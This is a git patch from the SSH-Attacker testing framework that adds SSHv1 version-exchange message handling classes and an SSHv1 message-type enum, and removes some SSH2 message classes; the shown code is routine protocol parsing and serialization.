SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/VersionExchangeMessageSSHV1Handler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/VersionExchangeMessageSSHV1Parser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/VersionExchangeMessageSSHV1Preparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/VersionExchangeMessageSSHV1Serializer.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/VersionExchangeMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/VersionExchangeMessageSSHV1Handler.java new file mode 100644 index 000000000..2a12eddac --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/VersionExchangeMessageSSHV1Handler.java @@ -0,0 +1,57 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; + +public class VersionExchangeMessageSSHV1Handler + extends ProtocolMessageHandler { + + public VersionExchangeMessageSSHV1Handler(SshContext context) { + super(context); + } + + /*public VersionExchangeMessageHandler(SshContext context, VersionExchangeMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(VersionExchangeMessageSSHV1 message) { + if (sshContext.isHandleAsClient()) { + sshContext.setServerVersion(message.getVersion().getValue()); + sshContext.setServerComment(message.getComment().getValue()); + // sshContext.getExchangeHashInputHolder().setServerVersion(message); + } else { + sshContext.setClientVersion(message.getVersion().getValue()); + sshContext.setClientComment(message.getComment().getValue()); + // sshContext.getExchangeHashInputHolder().setClientVersion(message); + } + } + + /*@Override + public VersionExchangeMessageParser getParser(byte[] array) { + return new VersionExchangeMessageParser(array); + } + + @Override + public VersionExchangeMessageParser getParser(byte[] array, int startPosition) { + return new VersionExchangeMessageParser(array, startPosition); + } + + @Override + public VersionExchangeMessagePreparator getPreparator() { + return new VersionExchangeMessagePreparator(context.getChooser(), message); + } + + @Override + public VersionExchangeMessageSerializer getSerializer() { + return new VersionExchangeMessageSerializer(message); + }*/ +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java new file mode 100644 index 000000000..1e905d0f3 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java @@ -0,0 +1,112 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.constants.CharConstants; +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.VersionExchangeMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.VersionExchangeMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.VersionExchangeMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.VersionExchangeMessageSSHV1Serializer; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class VersionExchangeMessageSSHV1 extends ProtocolMessage { + + private static final Logger LOGGER = LogManager.getLogger(); + + private ModifiableString version; + private ModifiableString comment; + private ModifiableString endOfMessageSequence; + + public VersionExchangeMessageSSHV1() { + super(); + this.protocolMessageType = ProtocolMessageType.VERSION_EXCHANGE_MESSAGE; + } + + public ModifiableString getVersion() { + return version; + } + + public void setVersion(ModifiableString version) { + this.version = version; + } + + public void setVersion(String version) { + this.version = ModifiableVariableFactory.safelySetValue(this.version, version); + } + + public ModifiableString getComment() { + return comment; + } + + public void setComment(ModifiableString comment) { + this.comment = comment; + } + + public void setComment(String comment) { + this.comment = ModifiableVariableFactory.safelySetValue(this.comment, comment); + } + + public String getIdentification() { + if (this.comment.getValue().isEmpty()) return this.version.getValue(); + return this.version.getValue() + + CharConstants.VERSION_COMMENT_SEPARATOR + + this.comment.getValue(); + } + + public ModifiableString getEndOfMessageSequence() { + return endOfMessageSequence; + } + + public void setEndOfMessageSequence(ModifiableString endOfMessageSequence) { + this.endOfMessageSequence = endOfMessageSequence; + } + + public void setEndOfMessageSequence(String endOfMessageSequence) { + this.endOfMessageSequence = + ModifiableVariableFactory.safelySetValue( + this.endOfMessageSequence, endOfMessageSequence); + } + + @Override + public VersionExchangeMessageSSHV1Handler getHandler(SshContext context) { + return new VersionExchangeMessageSSHV1Handler(context); + } + + @Override + public String toCompactString() { + return this.getClass().getSimpleName(); + } + + @Override + public VersionExchangeMessageSSHV1Parser getParser(SshContext context, InputStream stream) { + return new VersionExchangeMessageSSHV1Parser(stream); + } + + @Override + public VersionExchangeMessageSSHV1Preparator getPreparator(SshContext context) { + return new VersionExchangeMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public VersionExchangeMessageSSHV1Serializer getSerializer(SshContext context) { + LOGGER.debug("[bro] getting serializer"); + return new VersionExchangeMessageSSHV1Serializer(this); + } + + @Override + public String toShortString() { + return "VESION_EXCHANGE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/VersionExchangeMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/VersionExchangeMessageSSHV1Parser.java new file mode 100644 index 000000000..ddcd24b3c --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/VersionExchangeMessageSSHV1Parser.java @@ -0,0 +1,72 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import static de.rub.nds.modifiablevariable.util.StringUtil.backslashEscapeString; + +import de.rub.nds.sshattacker.core.constants.CharConstants; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class VersionExchangeMessageSSHV1Parser + extends ProtocolMessageParser { + + private static final Logger LOGGER = LogManager.getLogger(); + + /*public VersionExchangeMessageParser(byte[] array) { + super(array); + } + + public VersionExchangeMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + }*/ + + public VersionExchangeMessageSSHV1Parser(InputStream stream) { + super(stream); + } + + /*@Override + protected VersionExchangeMessage createMessage() { + return new VersionExchangeMessage(); + }*/ + + private void parseVersion(VersionExchangeMessageSSHV1 message) { + // parse till CR NL (and remove them) + String result = this.parseStringTill(CharConstants.NEWLINE); + if (result.contains("\r")) { + message.setEndOfMessageSequence("\r\n"); + } else { + message.setEndOfMessageSequence("\n"); + } + result = result.replace("\n", "").replace("\r", ""); + + String[] parts = result.split(String.valueOf(CharConstants.VERSION_COMMENT_SEPARATOR), 2); + message.setVersion(parts[0]); + LOGGER.debug("Version: " + backslashEscapeString(parts[0])); + if (parts.length == 2) { + message.setComment(parts[1]); + LOGGER.debug("Comment: " + backslashEscapeString(parts[1])); + } else { + message.setComment(""); + LOGGER.debug("Comment: [none]"); + } + } + + // @Override + public void parseProtocolMessageContents(VersionExchangeMessageSSHV1 message) { + parseVersion(message); + } + + @Override + public void parse(VersionExchangeMessageSSHV1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/VersionExchangeMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/VersionExchangeMessageSSHV1Preparator.java new file mode 100644 index 000000000..fa749c372 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/VersionExchangeMessageSSHV1Preparator.java @@ -0,0 +1,42 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; + +public class VersionExchangeMessageSSHV1Preparator + extends ProtocolMessagePreparator { + + public VersionExchangeMessageSSHV1Preparator( + Chooser chooser, VersionExchangeMessageSSHV1 message) { + super(chooser, message); + } + + @Override + public void prepareProtocolMessageContents() { + if (chooser.getContext().getSshContext().isClient()) { + getObject().setVersion(chooser.getClientVersion()); + getObject().setComment(chooser.getClientComment()); + getObject().setEndOfMessageSequence(chooser.getClientEndOfMessageSequence()); + /*chooser.getContext() + .getSshContext() + .getExchangeHashInputHolder() + .setClientVersion(getObject());*/ + } else { + getObject().setVersion(chooser.getServerVersion()); + getObject().setComment(chooser.getServerComment()); + getObject().setEndOfMessageSequence(chooser.getServerEndOfMessageSequence()); + /* chooser.getContext() + .getSshContext() + .getExchangeHashInputHolder() + .setServerVersion(getObject());*/ + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/VersionExchangeMessageSSHV1Serializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/VersionExchangeMessageSSHV1Serializer.java new file mode 100644 index 000000000..88e57fcfc --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/VersionExchangeMessageSSHV1Serializer.java @@ -0,0 +1,69 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.CharConstants; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; +import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class VersionExchangeMessageSSHV1Serializer + extends ProtocolMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public VersionExchangeMessageSSHV1Serializer(VersionExchangeMessageSSHV1 message) { + super(message); + } + + private void serializeVersion() { + if (message.getVersion().getValue().isEmpty()) { + LOGGER.debug("Version: [none]"); + } else { + LOGGER.debug("Version: " + message.getVersion().getValue()); + appendString(message.getVersion().getValue(), StandardCharsets.US_ASCII); + } + } + + private void serializeComment() { + if (message.getComment().getValue().isEmpty()) { + LOGGER.debug("Comment: [none]"); + } else { + LOGGER.debug("Comment: " + message.getComment().getValue()); + appendString( + String.valueOf(CharConstants.VERSION_COMMENT_SEPARATOR), + StandardCharsets.US_ASCII); + appendString(message.getComment().getValue(), StandardCharsets.US_ASCII); + } + } + + private void serializeEndOfMessageSequence() { + LOGGER.debug( + "End of Line Sequence: " + + message.getEndOfMessageSequence() + .getValue() + .replace("\r", "[CR]") + .replace("\n", "[NL]")); + appendString(message.getEndOfMessageSequence().getValue(), StandardCharsets.US_ASCII); + } + + // @Override + protected void serializeProtocolMessageContents() { + serializeVersion(); + serializeComment(); + serializeEndOfMessageSequence(); + } + + @Override + protected byte[] serializeBytes() { + serializeProtocolMessageContents(); + return getAlreadySerialized(); + } +} From 623051651bb73eb25802c5d10410995406c02bb3 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 24 Jul 2023 22:11:04 +0200 Subject: [PATCH 046/176] wip: cleanup code and adding basic sshv1 functions --- .../core/constants/ProtocolMessageType.java | 4 - .../constants/ProtocolMessageTypeSSHV1.java | 200 +++++++++++ .../layer/hints/PacketLayerHintSSHV1.java | 95 +++++ .../core/layer/impl/SSH1Layer.java | 326 ++++++++++++++---- .../core/layer/impl/SSH2Layer.java | 17 - .../core/layer/impl/TransportLayer.java | 4 +- .../handler/AuthenticationMessageHandler.java | 38 -- .../handler/ConnectionMessageHandler.java | 38 -- .../message/AuthenticationMessage.java | 129 ------- .../parser/AuthenticationMessageParser.java | 45 --- .../AuthenticationMessagePreparator.java | 41 --- .../AuthenticationMessageSerializer.java | 41 --- .../connection/message/ConnectionMessage.java | 129 ------- .../parser/ConnectionMessageParser.java | 45 --- .../ConnectionMessagePreparator.java | 40 --- .../ConnectionMessageSerializer.java | 40 --- 16 files changed, 554 insertions(+), 678 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ConnectionMessageParser.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java index 04c03c050..4a4aad0b6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java @@ -18,10 +18,6 @@ public enum ProtocolMessageType { APPLICATION_DATA((byte) 23), HEARTBEAT((byte) 24), TLS12_CID((byte) 25),*/ - AUTHENTICATION((byte) 1), - CONNECTION((byte) 2), - TRANSPORT((byte) 3), - VERSION_EXCHANGE_MESSAGE((byte) 0), ASCII_MESSAGE((byte) 20), SSH_MSG_DISCONNECT((byte) 1), diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java new file mode 100644 index 000000000..6c46efb76 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java @@ -0,0 +1,200 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.constants; + +import java.util.HashMap; +import java.util.Map; + +public enum ProtocolMessageTypeSSHV1 { + + VERSION_EXCHANGE_MESSAGE((byte) 0), + ASCII_MESSAGE((byte) 40), + SSH_MSG_DISCONNECT((byte) 1), + SSH_SMSG_PUBLIC_KEY((byte) 2), + SSH_CMSG_SESSION_KEY((byte) 3), + SSH_CMSG_USER((byte) 4), + SSH_CMSG_AUTH_RHOSTS((byte) 5), + SSH_CMSG_AUTH_RSA((byte) 6), + SSH_SMSG_AUTH_RSA_CHALLENGE((byte) 7), + SSH_CMSG_AUTH_RSA_RESPONSE((byte) 8), + SSH_CMSG_AUTH_PASSWORD((byte) 9), + SSH_CMSG_REQUEST_PTY((byte) 10), + SSH_CMSG_WINDOW_SIZE((byte) 11), + SSH_CMSG_EXEC_SHELL((byte) 12), + SSH_CMSG_EXEC_CMD((byte) 13), + SSH_SMSG_SUCCESS((byte) 14), + SSH_SMSG_FAILURE((byte) 15), + SSH_CMSG_STDIN_DATA((byte) 16), + SSH_SMSG_STDOUT_DATA((byte) 17), + SSH_SMSG_STDERR_DATA((byte) 18), + SSH_CMSG_EOF((byte) 19), + SSH_SMSG_EXITSTATUS((byte) 20), + SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 21), + SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 22), + SSH_MSG_CHANNEL_DATA((byte) 23), + SSH_MSG_CHANNEL_CLOSE((byte) 24), + SSH_MSG_CHANNEL_CLOSE_CONFIRMATION((byte) 25), + SSH_SMSG_X11_OPEN((byte) 27), + SSH_CMSG_PORT_FORWARD_REQUEST((byte) 28), + SSH_MSG_PORT_OPEN((byte) 29), + SSH_CMSG_AGENT_REQUEST_FORWARDING((byte) 30), + SSH_SMSG_AGENT_OPEN((byte) 31), + SSH_MSG_IGNORE((byte) 32), + SSH_CMSG_EXIT_CONFIRMATION((byte) 33), + SSH_CMSG_X11_REQUEST_FORWARDING((byte) 34), + SSH_CMSG_AUTH_RHOSTS_RSA((byte) 35), + SSH_MSG_DEBUG((byte) 36), + SSH_CMSG_REQUEST_COMPRESSION((byte) 37); + + /* + // 9 - 19 unassigned (transport layer generic) + SSH_MSG_KEXINIT((byte) 20), + SSH_MSG_NEWKEYS((byte) 21), + // 22 - 29 unassigned (algorithm negotiation) + // 30 - 49 reserved (key exchange method specific) + // [ RFC 4419 ] + SSH_MSG_KEX_DH_GEX_REQUEST_OLD((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_REQUEST((byte) 34, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_GROUP((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_INIT((byte) 32, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + SSH_MSG_KEX_DH_GEX_REPLY((byte) 33, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), + // [ RFC 4253 ] + SSH_MSG_KEXDH_INIT((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN), + SSH_MSG_KEXDH_REPLY((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN), + // [ https://datatracker.ietf.org/doc/html/draft-kampanakis-curdle-pq-ssh-00 ] + SSH_MSG_HBR_INIT((byte) 30, KeyExchangeFlowType.HYBRID), + SSH_MSG_HBR_REPLY((byte) 31, KeyExchangeFlowType.HYBRID), + // [ RFC 5656 ] + SSH_MSG_KEX_ECDH_INIT((byte) 30, KeyExchangeFlowType.ECDH), + SSH_MSG_KEX_ECDH_REPLY((byte) 31, KeyExchangeFlowType.ECDH), + SSH_MSG_ECMQV_INIT((byte) 30, KeyExchangeFlowType.ECMQV), + SSH_MSG_ECMQV_REPLY((byte) 31, KeyExchangeFlowType.ECMQV), + // [ RFC 4432 ] + SSH_MSG_KEXRSA_PUBKEY((byte) 30, KeyExchangeFlowType.RSA), + SSH_MSG_KEXRSA_SECRET((byte) 31, KeyExchangeFlowType.RSA), + SSH_MSG_KEXRSA_DONE((byte) 32, KeyExchangeFlowType.RSA), + // [ RFC 4462 ] + // TODO: Add specificTo on GSS messages + SSH_MSG_KEXGSS_INIT((byte) 30), + SSH_MSG_KEXGSS_CONTINUE((byte) 31), + SSH_MSG_KEXGSS_COMPLETE((byte) 32), + SSH_MSG_KEXGSS_HOSTKEY((byte) 33), + SSH_MSG_KEXGSS_ERROR((byte) 34), + SSH_MSG_KEXGSS_GROUPREQ((byte) 40), + SSH_MSG_KEXGSS_GROUP((byte) 41), + // [ RFC 4252 ] + SSH_MSG_USERAUTH_REQUEST((byte) 50), + SSH_MSG_USERAUTH_FAILURE((byte) 51), + SSH_MSG_USERAUTH_SUCCESS((byte) 52), + SSH_MSG_USERAUTH_BANNER((byte) 53), + // 54 - 59 unassigned (user authentication generic) + // 60 - 79 reserved (user authentication method specific) + // [ RFC 4252 ] + SSH_MSG_USERAUTH_PK_OK((byte) 60, AuthenticationMethod.PUBLICKEY), + SSH_MSG_USERAUTH_PASSWD_CHANGEREQ((byte) 60, AuthenticationMethod.PASSWORD), + // [ RFC 4256 ] + SSH_MSG_USERAUTH_INFO_REQUEST((byte) 60, AuthenticationMethod.KEYBOARD_INTERACTIVE), + SSH_MSG_USERAUTH_INFO_RESPONSE((byte) 61, AuthenticationMethod.KEYBOARD_INTERACTIVE), + // [ RFC 4462 ] + SSH_MSG_USERAUTH_GSSAPI_RESPONSE( + (byte) 60, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_TOKEN( + (byte) 61, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE( + (byte) 63, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_ERROR( + (byte) 64, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_ERRTOK( + (byte) 65, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + SSH_MSG_USERAUTH_GSSAPI_MIC( + (byte) 66, + new AuthenticationMethod[] { + AuthenticationMethod.GSSAPI, + AuthenticationMethod.GSSAPI_WITH_MIC, + AuthenticationMethod.GSSAPI_KEYEX + }), + // [ RFC 4254 ] + SSH_MSG_GLOBAL_REQUEST((byte) 80), + SSH_MSG_REQUEST_SUCCESS((byte) 81), + SSH_MSG_REQUEST_FAILURE((byte) 82), + // 83 - 89 unassigned (connection protocol generic) + SSH_MSG_CHANNEL_OPEN((byte) 90), + SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 91), + SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 92), + SSH_MSG_CHANNEL_WINDOW_ADJUST((byte) 93), + SSH_MSG_CHANNEL_DATA((byte) 94), + SSH_MSG_CHANNEL_EXTENDED_DATA((byte) 95), + SSH_MSG_CHANNEL_EOF((byte) 96), + SSH_MSG_CHANNEL_CLOSE((byte) 97), + SSH_MSG_CHANNEL_REQUEST((byte) 98), + SSH_MSG_CHANNEL_SUCCESS((byte) 99), + SSH_MSG_CHANNEL_FAILURE((byte) 100), + // 101 - 127 unassigned (channel related messages) + // 128 - 191 reserved (for client protocols) + // 192 - 255 reserved for private use (local extensions) + UNKNOWN((byte) 255); +*/ + private byte value; + private final Enum[] specificTo; + + private static final Map MAP; + + private ProtocolMessageTypeSSHV1(byte value) { + this.value = value; + this.specificTo = new Enum[] {}; + } + + private ProtocolMessageTypeSSHV1(byte value, Enum... specificTo) { + this.value = value; + this.specificTo = specificTo; + } + + static { + MAP = new HashMap<>(); + for (ProtocolMessageTypeSSHV1 cm : ProtocolMessageTypeSSHV1.values()) { + MAP.put(cm.value, cm); + } + } + + public static ProtocolMessageTypeSSHV1 getContentType(byte value) { + return MAP.get(value); + } + + public byte getValue() { + return value; + } + + public byte[] getArrayValue() { + return new byte[] {value}; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java new file mode 100644 index 000000000..8bb81a427 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java @@ -0,0 +1,95 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.layer.hints; + +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.constants.ProtocolMessageTypeSSHV1; + +import java.util.Objects; + +/** + * The Record Layer/Fragment layer need information about the messages they're sending. This class + * holds information about the messages such as their message type. + */ +public class PacketLayerHintSSHV1 implements LayerProcessingHint { + + private final ProtocolMessageTypeSSHV1 type; + + private final Integer epoch; + + private final Integer sequenceNumber; + + private final Integer messageSequence; + + public PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1 type) { + this.type = type; + this.epoch = null; + this.sequenceNumber = null; + this.messageSequence = null; + } + + public PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1 type, int epoch, int sequenceNumber) { + this.type = type; + this.epoch = epoch; + this.sequenceNumber = sequenceNumber; + this.messageSequence = null; + } + + public PacketLayerHintSSHV1(ProtocolMessageTypeSSHV1 type, int messageSequence) { + this.type = type; + this.epoch = null; + this.sequenceNumber = null; + this.messageSequence = messageSequence; + } + + @Override + public boolean equals(Object other) { + if (other instanceof PacketLayerHintSSHV1) { + PacketLayerHintSSHV1 otherHint = (PacketLayerHintSSHV1) other; + if (this.type == otherHint.type) { + return true; + } + if (this.epoch == otherHint.epoch) { + return false; + } + if (this.sequenceNumber == otherHint.sequenceNumber) { + return true; + } + if (this.messageSequence == otherHint.messageSequence) { + return true; + } + } + return false; + } + + @Override + public int hashCode() { + int hash = 3; + hash = 79 * hash + Objects.hashCode(this.type); + hash = 79 * hash + Objects.hashCode(this.epoch); + hash = 79 * hash + Objects.hashCode(this.sequenceNumber); + hash = 79 * hash + Objects.hashCode(this.messageSequence); + return hash; + } + + public ProtocolMessageTypeSSHV1 getType() { + return type; + } + + public Integer getEpoch() { + return epoch; + } + + public Integer getSequenceNumber() { + return sequenceNumber; + } + + public Integer getMessageSequence() { + return messageSequence; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 62265fb76..365c87029 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -18,18 +18,28 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.message.*;*/ +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; import de.rub.nds.sshattacker.core.exceptions.TimeoutException; +import de.rub.nds.sshattacker.core.layer.LayerConfiguration; import de.rub.nds.sshattacker.core.layer.LayerProcessingResult; import de.rub.nds.sshattacker.core.layer.ProtocolLayer; import de.rub.nds.sshattacker.core.layer.constant.ImplementedLayers; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHint; +import de.rub.nds.sshattacker.core.layer.hints.PacketLayerHintSSHV1; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.common.*; + +import 